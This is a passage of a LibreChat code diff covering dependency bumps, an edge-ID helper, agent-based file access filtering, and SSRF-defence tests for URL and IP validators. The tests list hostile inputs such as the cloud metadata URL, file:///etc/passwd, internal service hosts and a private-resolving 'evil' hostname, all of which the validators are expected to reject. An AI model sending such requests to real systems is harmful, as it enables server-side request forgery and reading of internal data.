+"test": "jest --coverage --watch --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
+"test:ci": "jest --coverage --ci --testPathIgnorePatterns=\"\\.*integration\\.|\\.*helper\\.|__tests__/helpers/\"",
"test:cache-integration:core": "jest --testPathPatterns=\"src/cache/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
"test:cache-integration:cluster": "jest --testPathPatterns=\"src/cluster/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false --runInBand",
"test:cache-integration:mcp": "jest --testPathPatterns=\"src/mcp/.*\\.cache_integration\\.spec\\.ts$\" --coverage=false",
@@ -90,10 +90,11 @@
"@google/genai": "^1.19.0",
"@keyv/redis": "^4.3.3",
"@langchain/core": "^0.3.80",
-"@librechat/agents": "^3.1.55",
+"@librechat/agents": "^3.1.56",
"@librechat/data-schemas": "*",
"@modelcontextprotocol/sdk": "^1.27.1",
"@smithy/node-http-handler": "^4.4.5",
+"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5",
"connect-redis": "^8.1.0",
"eventsource": "^3.0.2",
@@ -116,8 +117,7 @@
"node-fetch": "2.7.0",
"pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0",
-"tiktoken": "^1.0.15",
-"undici": "^7.18.2",
+"undici": "^7.24.1",
"zod": "^3.22.4"
}
}


@@ -22,8 +22,9 @@ jest.mock('winston', () => ({
}));

// Mock the Tokenizer
-jest.mock('~/utils', () => ({
-  Tokenizer: {
+jest.mock('~/utils/tokenizer', () => ({
+  __esModule: true,
+  default: {
    getTokenCount: jest.fn((text: string) => text.length), // Simple mock: 1 char = 1 token
  },
}));


@@ -1,5 +1,11 @@
import type { GraphEdge } from 'librechat-data-provider';
-import { getEdgeKey, getEdgeParticipants, filterOrphanedEdges, createEdgeCollector } from './edges';
+import {
+  getEdgeKey,
+  getEdgeParticipants,
+  collectEdgeAgentIds,
+  filterOrphanedEdges,
+  createEdgeCollector,
+} from './edges';

describe('edges utilities', () => {
  describe('getEdgeKey', () => {
@@ -70,6 +76,49 @@ describe('edges utilities', () => {
    });
  });
describe('collectEdgeAgentIds', () => {
it('should return empty set for undefined input', () => {
expect(collectEdgeAgentIds(undefined)).toEqual(new Set());
});
it('should return empty set for empty array', () => {
expect(collectEdgeAgentIds([])).toEqual(new Set());
});
it('should collect IDs from simple string from/to', () => {
const edges: GraphEdge[] = [{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' }];
expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b']));
});
it('should collect IDs from array from/to values', () => {
const edges: GraphEdge[] = [
{ from: ['agent_a', 'agent_b'], to: ['agent_c', 'agent_d'], edgeType: 'handoff' },
];
expect(collectEdgeAgentIds(edges)).toEqual(
new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d']),
);
});
it('should deduplicate IDs across edges', () => {
const edges: GraphEdge[] = [
{ from: 'agent_a', to: 'agent_b', edgeType: 'handoff' },
{ from: 'agent_b', to: 'agent_c', edgeType: 'handoff' },
{ from: 'agent_a', to: 'agent_c', edgeType: 'direct' },
];
expect(collectEdgeAgentIds(edges)).toEqual(new Set(['agent_a', 'agent_b', 'agent_c']));
});
it('should handle mixed scalar and array edges', () => {
const edges: GraphEdge[] = [
{ from: 'agent_a', to: ['agent_b', 'agent_c'], edgeType: 'handoff' },
{ from: ['agent_c', 'agent_d'], to: 'agent_e', edgeType: 'direct' },
];
expect(collectEdgeAgentIds(edges)).toEqual(
new Set(['agent_a', 'agent_b', 'agent_c', 'agent_d', 'agent_e']),
);
});
});
  describe('filterOrphanedEdges', () => {
    const edges: GraphEdge[] = [
      { from: 'agent_a', to: 'agent_b', edgeType: 'handoff' },


@@ -43,6 +43,20 @@ export function filterOrphanedEdges(edges: GraphEdge[], skippedAgentIds: Set<str
  });
}
/** Collects all unique agent IDs referenced across an array of edges. */
export function collectEdgeAgentIds(edges: GraphEdge[] | undefined): Set<string> {
const ids = new Set<string>();
if (!edges || edges.length === 0) {
return ids;
}
for (const edge of edges) {
for (const id of getEdgeParticipants(edge)) {
ids.add(id);
}
}
return ids;
}
/**
 * Result of discovering and aggregating edges from connected agents.
 */
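The new `collectEdgeAgentIds` helper above can be exercised in isolation. This is a minimal sketch: the `GraphEdge` shape and the local `getEdgeParticipants` below are simplified stand-ins for the real type from librechat-data-provider and the real helper in edges.ts.

```typescript
// Standalone sketch of the helper added above; types are simplified here.
type GraphEdge = { from: string | string[]; to: string | string[]; edgeType: string };

// Simplified stand-in for the real getEdgeParticipants in edges.ts:
// normalizes scalar/array endpoints into a flat list of agent IDs.
function getEdgeParticipants(edge: GraphEdge): string[] {
  const toArray = (v: string | string[]): string[] => (Array.isArray(v) ? v : [v]);
  return [...toArray(edge.from), ...toArray(edge.to)];
}

function collectEdgeAgentIds(edges: GraphEdge[] | undefined): Set<string> {
  const ids = new Set<string>();
  if (!edges || edges.length === 0) {
    return ids;
  }
  for (const edge of edges) {
    for (const id of getEdgeParticipants(edge)) {
      ids.add(id); // Set membership deduplicates IDs repeated across edges
    }
  }
  return ids;
}

// Mixed scalar and array endpoints, with agent_c repeated across edges
const exampleEdges: GraphEdge[] = [
  { from: 'agent_a', to: ['agent_b', 'agent_c'], edgeType: 'handoff' },
  { from: ['agent_c', 'agent_d'], to: 'agent_e', edgeType: 'direct' },
];
const ids = collectEdgeAgentIds(exampleEdges);
```

This mirrors the "mixed scalar and array edges" unit test: five unique IDs even though `agent_c` appears in two edges.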


@@ -31,6 +31,7 @@ import { filterFilesByEndpointConfig } from '~/files';
import { generateArtifactsPrompt } from '~/prompts';
import { getProviderConfig } from '~/endpoints';
import { primeResources } from './resources';
+import type { TFilterFilesByAgentAccess } from './resources';

/**
 * Extended agent type with additional fields needed after initialization
@@ -52,6 +53,8 @@ export type InitializedAgent = Agent & {
  toolDefinitions?: LCTool[];
  /** Precomputed flag indicating if any tools have defer_loading enabled (for efficient runtime checks) */
  hasDeferredTools?: boolean;
+  /** Whether the actions capability is enabled (resolved during tool loading) */
+  actionsEnabled?: boolean;
};

/**
@@ -90,6 +93,7 @@ export interface InitializeAgentParams {
    /** Serializable tool definitions for event-driven mode */
    toolDefinitions?: LCTool[];
    hasDeferredTools?: boolean;
+    actionsEnabled?: boolean;
  } | null>;
  /** Endpoint option (contains model_parameters and endpoint info) */
  endpointOption?: Partial<TEndpointOption>;
@@ -108,7 +112,9 @@ export interface InitializeAgentDbMethods extends EndpointDbMethods {
  /** Update usage tracking for multiple files */
  updateFilesUsage: (files: Array<{ file_id: string }>, fileIds?: string[]) => Promise<unknown[]>;
  /** Get files from database */
-  getFiles: (filter: unknown, sort: unknown, select: unknown, opts?: unknown) => Promise<unknown[]>;
+  getFiles: (filter: unknown, sort: unknown, select: unknown) => Promise<unknown[]>;
+  /** Filter files by agent access permissions (ownership or agent attachment) */
+  filterFilesByAgentAccess?: TFilterFilesByAgentAccess;
  /** Get tool files by IDs (user-uploaded files only, code files handled separately) */
  getToolFilesByIds: (fileIds: string[], toolSet: Set<EToolResources>) => Promise<unknown[]>;
  /** Get conversation file IDs */
@@ -268,6 +274,7 @@ export async function initializeAgent(
  const { attachments: primedAttachments, tool_resources } = await primeResources({
    req: req as never,
    getFiles: db.getFiles as never,
+    filterFiles: db.filterFilesByAgentAccess,
    appConfig: req.config,
    agentId: agent.id,
    attachments: currentFiles
@@ -283,6 +290,7 @@
    userMCPAuthMap,
    toolDefinitions,
    hasDeferredTools,
+    actionsEnabled,
    tools: structuredTools,
  } = (await loadTools?.({
    req,
@@ -300,6 +308,7 @@
    toolRegistry: undefined,
    toolDefinitions: [],
    hasDeferredTools: false,
+    actionsEnabled: undefined,
  };

  const { getOptions, overrideProvider } = getProviderConfig({
@@ -409,6 +418,7 @@
    userMCPAuthMap,
    toolDefinitions,
    hasDeferredTools,
+    actionsEnabled,
    attachments: finalAttachments,
    toolContextMap: toolContextMap ?? {},
    useLegacyContent: !!options.useLegacyContent,


@@ -19,7 +19,8 @@ import type { TAttachment, MemoryArtifact } from 'librechat-data-provider';
import type { BaseMessage, ToolMessage } from '@langchain/core/messages';
import type { Response as ServerResponse } from 'express';
import { GenerationJobManager } from '~/stream/GenerationJobManager';
-import { Tokenizer, resolveHeaders, createSafeUser } from '~/utils';
+import { resolveHeaders, createSafeUser } from '~/utils';
+import Tokenizer from '~/utils/tokenizer';

type RequiredMemoryMethods = Pick<
  MemoryMethods,


@@ -4,7 +4,7 @@ import { EModelEndpoint, EToolResources, AgentCapabilities } from 'librechat-dat
import type { TAgentsEndpoint, TFile } from 'librechat-data-provider';
import type { IUser, AppConfig } from '@librechat/data-schemas';
import type { Request as ServerRequest } from 'express';
-import type { TGetFiles } from './resources';
+import type { TGetFiles, TFilterFilesByAgentAccess } from './resources';

// Mock logger
jest.mock('@librechat/data-schemas', () => ({
@@ -17,16 +17,16 @@ describe('primeResources', () => {
  let mockReq: ServerRequest & { user?: IUser };
  let mockAppConfig: AppConfig;
  let mockGetFiles: jest.MockedFunction<TGetFiles>;
+  let mockFilterFiles: jest.MockedFunction<TFilterFilesByAgentAccess>;
  let requestFileSet: Set<string>;

  beforeEach(() => {
-    // Reset mocks
    jest.clearAllMocks();
-    // Setup mock request
-    mockReq = {} as unknown as ServerRequest & { user?: IUser };
+    mockReq = {
+      user: { id: 'user1', role: 'USER' },
+    } as unknown as ServerRequest & { user?: IUser };
-    // Setup mock appConfig
    mockAppConfig = {
      endpoints: {
        [EModelEndpoint.agents]: {
@@ -35,10 +35,9 @@
      },
    } as AppConfig;
-    // Setup mock getFiles function
    mockGetFiles = jest.fn();
+    mockFilterFiles = jest.fn().mockImplementation(({ files }) => Promise.resolve(files));
-    // Setup request file set
    requestFileSet = new Set(['file1', 'file2', 'file3']);
  });
@@ -70,20 +69,21 @@
        req: mockReq,
        appConfig: mockAppConfig,
        getFiles: mockGetFiles,
+        filterFiles: mockFilterFiles,
        requestFileSet,
        attachments: undefined,
        tool_resources,
+        agentId: 'agent_test',
      });

-      expect(mockGetFiles).toHaveBeenCalledWith(
-        { file_id: { $in: ['ocr-file-1'] } },
-        {},
-        {},
-        { userId: undefined, agentId: undefined },
-      );
+      expect(mockGetFiles).toHaveBeenCalledWith({ file_id: { $in: ['ocr-file-1'] } }, {}, {});
+      expect(mockFilterFiles).toHaveBeenCalledWith({
+        files: mockOcrFiles,
+        userId: 'user1',
+        role: 'USER',
+        agentId: 'agent_test',
+      });
      expect(result.attachments).toEqual(mockOcrFiles);
-      // Context field is deleted after files are fetched and re-categorized
-      // Since the file is not embedded and has no special properties, it won't be categorized
      expect(result.tool_resources).toEqual({});
    });
  });
@@ -1108,12 +1108,10 @@
        'ocr-file-1',
      );

-      // Verify getFiles was called with merged file_ids
      expect(mockGetFiles).toHaveBeenCalledWith(
        { file_id: { $in: ['context-file-1', 'ocr-file-1'] } },
        {},
        {},
-        { userId: undefined, agentId: undefined },
      );
    });
@@ -1241,6 +1239,249 @@
    });
  });
describe('access control filtering', () => {
it('should filter context files through filterFiles when provided', async () => {
const ownedFile: TFile = {
user: 'user1',
file_id: 'owned-file',
filename: 'owned.pdf',
filepath: '/uploads/owned.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
const inaccessibleFile: TFile = {
user: 'other-user',
file_id: 'inaccessible-file',
filename: 'secret.pdf',
filepath: '/uploads/secret.pdf',
object: 'file',
type: 'application/pdf',
bytes: 2048,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([ownedFile, inaccessibleFile]);
mockFilterFiles.mockResolvedValue([ownedFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['owned-file', 'inaccessible-file'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_shared',
});
expect(mockFilterFiles).toHaveBeenCalledWith({
files: [ownedFile, inaccessibleFile],
userId: 'user1',
role: 'USER',
agentId: 'agent_shared',
});
expect(result.attachments).toEqual([ownedFile]);
expect(result.attachments).not.toContainEqual(inaccessibleFile);
});
it('should filter OCR files merged into context through filterFiles', async () => {
const ocrFile: TFile = {
user: 'other-user',
file_id: 'ocr-restricted',
filename: 'scan.pdf',
filepath: '/uploads/scan.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([ocrFile]);
mockFilterFiles.mockResolvedValue([]);
const tool_resources = {
[EToolResources.ocr]: {
file_ids: ['ocr-restricted'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_shared',
});
expect(mockFilterFiles).toHaveBeenCalledWith({
files: [ocrFile],
userId: 'user1',
role: 'USER',
agentId: 'agent_shared',
});
expect(result.attachments).toBeUndefined();
});
it('should skip filtering when filterFiles is not provided', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
it('should skip filtering when user ID is missing', async () => {
const reqNoUser = {} as unknown as ServerRequest & { user?: IUser };
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: reqNoUser,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
it('should gracefully handle filterFiles rejection', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
mockFilterFiles.mockRejectedValue(new Error('DB failure'));
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
agentId: 'agent_test',
});
expect(logger.error).toHaveBeenCalledWith('Error priming resources', expect.any(Error));
expect(result.tool_resources).toEqual(tool_resources);
});
it('should skip filtering when agentId is missing', async () => {
const mockFile: TFile = {
user: 'user1',
file_id: 'file-1',
filename: 'doc.pdf',
filepath: '/uploads/doc.pdf',
object: 'file',
type: 'application/pdf',
bytes: 1024,
embedded: false,
usage: 0,
};
mockGetFiles.mockResolvedValue([mockFile]);
const tool_resources = {
[EToolResources.context]: {
file_ids: ['file-1'],
},
};
const result = await primeResources({
req: mockReq,
appConfig: mockAppConfig,
getFiles: mockGetFiles,
filterFiles: mockFilterFiles,
requestFileSet,
attachments: undefined,
tool_resources,
});
expect(mockFilterFiles).not.toHaveBeenCalled();
expect(result.attachments).toEqual([mockFile]);
});
});
  describe('edge cases', () => {
    it('should handle missing appConfig agents endpoint gracefully', async () => {
      const reqWithoutLocals = {} as ServerRequest & { user?: IUser };


@@ -10,16 +10,26 @@ import type { Request as ServerRequest } from 'express';
 * @param filter - MongoDB filter query for files
 * @param _sortOptions - Sorting options (currently unused)
 * @param selectFields - Field selection options
- * @param options - Additional options including userId and agentId for access control
 * @returns Promise resolving to array of files
 */
export type TGetFiles = (
  filter: FilterQuery<IMongoFile>,
  _sortOptions: ProjectionType<IMongoFile> | null | undefined,
  selectFields: QueryOptions<IMongoFile> | null | undefined,
-  options?: { userId?: string; agentId?: string },
) => Promise<Array<TFile>>;

+/**
+ * Function type for filtering files by agent access permissions.
+ * Used to enforce that only files the user has access to (via ownership or agent attachment)
+ * are returned after a raw DB query.
+ */
+export type TFilterFilesByAgentAccess = (params: {
+  files: Array<TFile>;
+  userId: string;
+  role?: string;
+  agentId: string;
+}) => Promise<Array<TFile>>;

/**
 * Helper function to add a file to a specific tool resource category
 * Prevents duplicate files within the same resource category
@@ -128,7 +138,7 @@
/**
 * Primes resources for agent execution by processing attachments and tool resources
 * This function:
- * 1. Fetches OCR files if OCR is enabled
+ * 1. Fetches context/OCR files (filtered by agent access control when available)
 * 2. Processes attachment files
 * 3. Categorizes files into appropriate tool resources
 * 4. Prevents duplicate files across all sources
@@ -137,15 +147,18 @@ const categorizeFileForToolResources = ({
 * @param params.req - Express request object
 * @param params.appConfig - Application configuration object
 * @param params.getFiles - Function to retrieve files from database
+ * @param params.filterFiles - Optional function to enforce agent-based file access control
 * @param params.requestFileSet - Set of file IDs from the current request
 * @param params.attachments - Promise resolving to array of attachment files
 * @param params.tool_resources - Existing tool resources for the agent
+ * @param params.agentId - Agent ID used for access control filtering
 * @returns Promise resolving to processed attachments and updated tool resources
 */
export const primeResources = async ({
  req,
  appConfig,
  getFiles,
+  filterFiles,
  requestFileSet,
  attachments: _attachments,
  tool_resources: _tool_resources,
@@ -157,6 +170,7 @@
  attachments: Promise<Array<TFile | null>> | undefined;
  tool_resources: AgentToolResources | undefined;
  getFiles: TGetFiles;
+  filterFiles?: TFilterFilesByAgentAccess;
  agentId?: string;
}): Promise<{
  attachments: Array<TFile | undefined> | undefined;
@@ -228,15 +242,23 @@
  if (fileIds.length > 0 && isContextEnabled) {
    delete tool_resources[EToolResources.context];

-    const context = await getFiles(
+    let context = await getFiles(
      {
        file_id: { $in: fileIds },
      },
      {},
      {},
-      { userId: req.user?.id, agentId },
    );

+    if (filterFiles && req.user?.id && agentId) {
+      context = await filterFiles({
+        files: context,
+        userId: req.user.id,
+        role: req.user.role,
+        agentId,
+      });
+    }

    for (const file of context) {
      if (!file?.file_id) {
        continue;
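The control flow of the new access-control gate in `primeResources` can be sketched on its own. Everything below is a simplified illustration, not the actual exports: the reduced `TFile` shape, the `FilterFiles` callback alias, and the hypothetical `fetchContextFiles` wrapper all stand in for the real signatures.

```typescript
// Simplified sketch of the filtering gate added to primeResources above.
// fetchContextFiles and the reduced TFile shape are illustrative only.
type TFile = { file_id: string; user: string };

type FilterFiles = (params: {
  files: TFile[];
  userId: string;
  role?: string;
  agentId: string;
}) => Promise<TFile[]>;

async function fetchContextFiles(
  getFiles: () => Promise<TFile[]>,
  opts: { filterFiles?: FilterFiles; userId?: string; role?: string; agentId?: string },
): Promise<TFile[]> {
  const { filterFiles, userId, role, agentId } = opts;
  let context = await getFiles();
  // The filter only runs when the callback, user ID, and agent ID are all
  // present; otherwise the raw query result passes through unchanged.
  if (filterFiles && userId && agentId) {
    context = await filterFiles({ files: context, userId, role, agentId });
  }
  return context;
}
```

An ownership-based callback would then drop files belonging to other users, while omitting `agentId` skips filtering entirely, matching the "skip filtering when agentId is missing" test above.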


@@ -8,10 +8,12 @@ import {
  extractMCPServerDomain,
  isActionDomainAllowed,
  isEmailDomainAllowed,
+  isOAuthUrlAllowed,
  isMCPDomainAllowed,
  isPrivateIP,
  isSSRFTarget,
  resolveHostnameSSRF,
+  validateEndpointURL,
} from './domain';

const mockedLookup = lookup as jest.MockedFunction<typeof lookup>;

@@ -177,6 +179,20 @@ describe('isSSRFTarget', () => {
    expect(isSSRFTarget('fd00::1')).toBe(true);
    expect(isSSRFTarget('fe80::1')).toBe(true);
  });
it('should block full fe80::/10 link-local range (fe80-febf)', () => {
expect(isSSRFTarget('fe90::1')).toBe(true);
expect(isSSRFTarget('fea0::1')).toBe(true);
expect(isSSRFTarget('feb0::1')).toBe(true);
expect(isSSRFTarget('febf::1')).toBe(true);
expect(isSSRFTarget('fec0::1')).toBe(false);
});
it('should NOT false-positive on hostnames whose first label resembles a link-local prefix', () => {
expect(isSSRFTarget('fe90.example.com')).toBe(false);
expect(isSSRFTarget('fea0.api.io')).toBe(false);
expect(isSSRFTarget('febf.service.net')).toBe(false);
});
});

describe('internal hostnames', () => {
@@ -277,10 +293,17 @@ describe('isPrivateIP', () => {
    expect(isPrivateIP('[::1]')).toBe(true);
  });

-  it('should detect unique local (fc/fd) and link-local (fe80)', () => {
+  it('should detect unique local (fc/fd) and link-local (fe80::/10)', () => {
    expect(isPrivateIP('fc00::1')).toBe(true);
    expect(isPrivateIP('fd00::1')).toBe(true);
    expect(isPrivateIP('fe80::1')).toBe(true);
+    expect(isPrivateIP('fe90::1')).toBe(true);
+    expect(isPrivateIP('fea0::1')).toBe(true);
+    expect(isPrivateIP('feb0::1')).toBe(true);
+    expect(isPrivateIP('febf::1')).toBe(true);
+    expect(isPrivateIP('[fe90::1]')).toBe(true);
+    expect(isPrivateIP('fec0::1')).toBe(false);
+    expect(isPrivateIP('fe90.example.com')).toBe(false);
  });
});
@ -482,6 +505,8 @@ describe('resolveHostnameSSRF', () => {
expect(await resolveHostnameSSRF('::1')).toBe(true); expect(await resolveHostnameSSRF('::1')).toBe(true);
expect(await resolveHostnameSSRF('fc00::1')).toBe(true); expect(await resolveHostnameSSRF('fc00::1')).toBe(true);
expect(await resolveHostnameSSRF('fe80::1')).toBe(true); expect(await resolveHostnameSSRF('fe80::1')).toBe(true);
expect(await resolveHostnameSSRF('fe90::1')).toBe(true);
expect(await resolveHostnameSSRF('febf::1')).toBe(true);
expect(mockedLookup).not.toHaveBeenCalled();
});
@@ -1023,8 +1048,37 @@ describe('isMCPDomainAllowed', () => {
});
describe('invalid URL handling', () => {
it('should reject invalid URL when allowlist is configured', async () => {
const config = { url: 'not-a-valid-url' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false);
});
it('should reject templated URL when allowlist is configured', async () => {
const config = { url: 'http://{{CUSTOM_HOST}}/mcp' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(false);
});
it('should allow invalid URL when no allowlist is configured (defers to connection-level SSRF)', async () => {
const config = { url: 'http://{{CUSTOM_HOST}}/mcp' };
expect(await isMCPDomainAllowed(config, null)).toBe(true);
expect(await isMCPDomainAllowed(config, undefined)).toBe(true);
expect(await isMCPDomainAllowed(config, [])).toBe(true);
});
it('should allow config with whitespace-only URL (treated as absent)', async () => {
const config = { url: ' ' };
expect(await isMCPDomainAllowed(config, [])).toBe(true);
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
expect(await isMCPDomainAllowed(config, null)).toBe(true);
});
it('should allow config with empty string URL (treated as absent)', async () => {
const config = { url: '' };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
});
it('should allow config with no url property (stdio)', async () => {
const config = { command: 'node', args: ['server.js'] };
expect(await isMCPDomainAllowed(config, ['example.com'])).toBe(true);
});
});
@@ -1157,3 +1211,225 @@ describe('isMCPDomainAllowed', () => {
});
});
});
describe('isOAuthUrlAllowed', () => {
it('should return false when allowedDomains is null/undefined/empty', () => {
expect(isOAuthUrlAllowed('https://example.com/token', null)).toBe(false);
expect(isOAuthUrlAllowed('https://example.com/token', undefined)).toBe(false);
expect(isOAuthUrlAllowed('https://example.com/token', [])).toBe(false);
});
it('should return false for unparseable URLs', () => {
expect(isOAuthUrlAllowed('not-a-url', ['example.com'])).toBe(false);
});
it('should match exact hostnames', () => {
expect(isOAuthUrlAllowed('https://example.com/token', ['example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://other.com/token', ['example.com'])).toBe(false);
});
it('should match wildcard subdomains', () => {
expect(isOAuthUrlAllowed('https://api.example.com/token', ['*.example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://deep.nested.example.com/token', ['*.example.com'])).toBe(
true,
);
expect(isOAuthUrlAllowed('https://example.com/token', ['*.example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://other.com/token', ['*.example.com'])).toBe(false);
});
it('should be case-insensitive', () => {
expect(isOAuthUrlAllowed('https://EXAMPLE.COM/token', ['example.com'])).toBe(true);
expect(isOAuthUrlAllowed('https://example.com/token', ['EXAMPLE.COM'])).toBe(true);
});
it('should match private/internal URLs when hostname is in allowedDomains', () => {
expect(isOAuthUrlAllowed('http://localhost:8080/token', ['localhost'])).toBe(true);
expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['10.0.0.1'])).toBe(true);
expect(
isOAuthUrlAllowed('http://host.docker.internal:8044/token', ['host.docker.internal']),
).toBe(true);
expect(isOAuthUrlAllowed('http://myserver.local/token', ['*.local'])).toBe(true);
});
it('should match internal URLs with wildcard patterns', () => {
expect(isOAuthUrlAllowed('https://auth.company.internal/token', ['*.company.internal'])).toBe(
true,
);
expect(isOAuthUrlAllowed('https://company.internal/token', ['*.company.internal'])).toBe(true);
});
it('should not match when hostname is absent from allowedDomains', () => {
expect(isOAuthUrlAllowed('http://10.0.0.1/token', ['192.168.1.1'])).toBe(false);
expect(isOAuthUrlAllowed('http://localhost/token', ['host.docker.internal'])).toBe(false);
});
describe('protocol and port constraint enforcement', () => {
it('should enforce protocol when allowedDomains specifies one', () => {
expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal'])).toBe(
true,
);
expect(isOAuthUrlAllowed('http://auth.internal/token', ['https://auth.internal'])).toBe(
false,
);
});
it('should allow any protocol when allowedDomains has bare hostname', () => {
expect(isOAuthUrlAllowed('http://auth.internal/token', ['auth.internal'])).toBe(true);
expect(isOAuthUrlAllowed('https://auth.internal/token', ['auth.internal'])).toBe(true);
});
it('should enforce port when allowedDomains specifies one', () => {
expect(
isOAuthUrlAllowed('https://auth.internal:8443/token', ['https://auth.internal:8443']),
).toBe(true);
expect(
isOAuthUrlAllowed('https://auth.internal:6379/token', ['https://auth.internal:8443']),
).toBe(false);
expect(isOAuthUrlAllowed('https://auth.internal/token', ['https://auth.internal:8443'])).toBe(
false,
);
});
it('should allow any port when allowedDomains has no explicit port', () => {
expect(isOAuthUrlAllowed('https://auth.internal:8443/token', ['auth.internal'])).toBe(true);
expect(isOAuthUrlAllowed('https://auth.internal:22/token', ['auth.internal'])).toBe(true);
});
it('should reject wrong port even when hostname matches (prevents port-scanning)', () => {
expect(isOAuthUrlAllowed('http://10.0.0.1:6379/token', ['http://10.0.0.1:8080'])).toBe(false);
expect(isOAuthUrlAllowed('http://10.0.0.1:25/token', ['http://10.0.0.1:8080'])).toBe(false);
});
});
});
describe('validateEndpointURL', () => {
afterEach(() => {
jest.clearAllMocks();
});
it('should throw for unparseable URLs', async () => {
await expect(validateEndpointURL('not-a-url', 'test-ep')).rejects.toThrow(
'Invalid base URL for test-ep',
);
});
it('should throw for localhost URLs', async () => {
await expect(validateEndpointURL('http://localhost:8080/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for private IP URLs', async () => {
await expect(validateEndpointURL('http://192.168.1.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://10.0.0.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://172.16.0.1/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for link-local / metadata IP', async () => {
await expect(
validateEndpointURL('http://169.254.169.254/latest/meta-data/', 'test-ep'),
).rejects.toThrow('targets a restricted address');
});
it('should throw for loopback IP', async () => {
await expect(validateEndpointURL('http://127.0.0.1:11434/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for internal Docker/Kubernetes hostnames', async () => {
await expect(validateEndpointURL('http://redis:6379/', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
await expect(validateEndpointURL('http://mongodb:27017/', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw when hostname DNS-resolves to a private IP', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '10.0.0.5', family: 4 }] as never);
await expect(validateEndpointURL('https://evil.example.com/v1', 'test-ep')).rejects.toThrow(
'resolves to a restricted address',
);
});
it('should allow public URLs', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '104.18.7.192', family: 4 }] as never);
await expect(
validateEndpointURL('https://api.openai.com/v1', 'test-ep'),
).resolves.toBeUndefined();
});
it('should allow public URLs that resolve to public IPs', async () => {
mockedLookup.mockResolvedValueOnce([{ address: '8.8.8.8', family: 4 }] as never);
await expect(
validateEndpointURL('https://api.example.com/v1/chat', 'test-ep'),
).resolves.toBeUndefined();
});
it('should throw for non-HTTP/HTTPS schemes', async () => {
await expect(validateEndpointURL('ftp://example.com/v1', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
await expect(validateEndpointURL('file:///etc/passwd', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
await expect(validateEndpointURL('data:text/plain,hello', 'test-ep')).rejects.toThrow(
'only HTTP and HTTPS are permitted',
);
});
it('should throw for IPv6 loopback URL', async () => {
await expect(validateEndpointURL('http://[::1]:8080/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for IPv6 link-local URL', async () => {
await expect(validateEndpointURL('http://[fe80::1]/v1', 'test-ep')).rejects.toThrow(
'targets a restricted address',
);
});
it('should throw for IPv6 unique-local URL', async () => {
